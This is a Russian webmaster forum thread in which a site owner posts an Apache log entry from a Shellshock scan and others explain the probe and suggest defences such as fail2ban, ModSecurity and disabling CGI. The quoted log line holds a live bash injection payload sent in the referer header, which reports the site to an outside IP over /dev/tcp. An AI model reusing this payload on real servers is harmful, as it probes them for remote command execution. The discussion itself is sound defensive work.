- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Подскажите, пожалуйста, каким способом пытаются взломать сайт. В логах:
[Thu Feb 26 04:28:31 2015] [error] [client 91.109.2.132] script not found or unable to stat: /var/www/cgi-bin/php-cgi, referer: () { :;}; /bin/bash -c "echo site.ru/cgi-bin/php-cgi > /dev/tcp/213.233.161.42/23; echo site/cgi-bin/php-cgi > /dev/udp/213.233.161.42/80"
Что-то в скрипты заливают или как?
Ну чтото уже значит залито. Ищите дырку и залитые вредоносные скрипты. Ну и серверное ПО обновите.
Как я понял, в логах 404-я ошибка - "script not found or unable to stat", т.е. ничего пока "не залито".
Похоже на обычный скан с поиском скриптов, которые используют дырявый bash.
А можете подсказать, как обезопасить себя от такого сканирования?
ctit, Парсить через fail2ban логи и блокировать:)
Подскажите, пожалуйста, каким способом пытаются взломать сайт.
/ru/forum/867276
Если bash недоступен как CGI-скрипт - можно забить.
Недоступен, однако просто интересует как они пролезли на уровень выполнения команд? Т.е. эту команду как посылали?
Могли послать через куки,могли через referer,подробнее тут http://habrahabr.ru/company/mailru/blog/238475/
Да просто сканят на уязвимость, которую вам привели выше. Таких сканов обычно тучи бывают разных, расслабьтесь, все нормально.
Хотите обезопаситься от подобных сканов - ModSecurity + OWASP CoreRuleSet
Недоступен, однако просто интересует как они пролезли на уровень выполнения команд? Т.е. эту команду как посылали?
Посмотрите конфигурационный файл на предмет "ScriptAlias" или "ExecCGI".
Если используете панель - выключайте поддержку cgi. Это почти неактуальная технология.
...выключайте поддержку cgi. Это почти неактуальная технология.
если болит голова, используйте гильотину...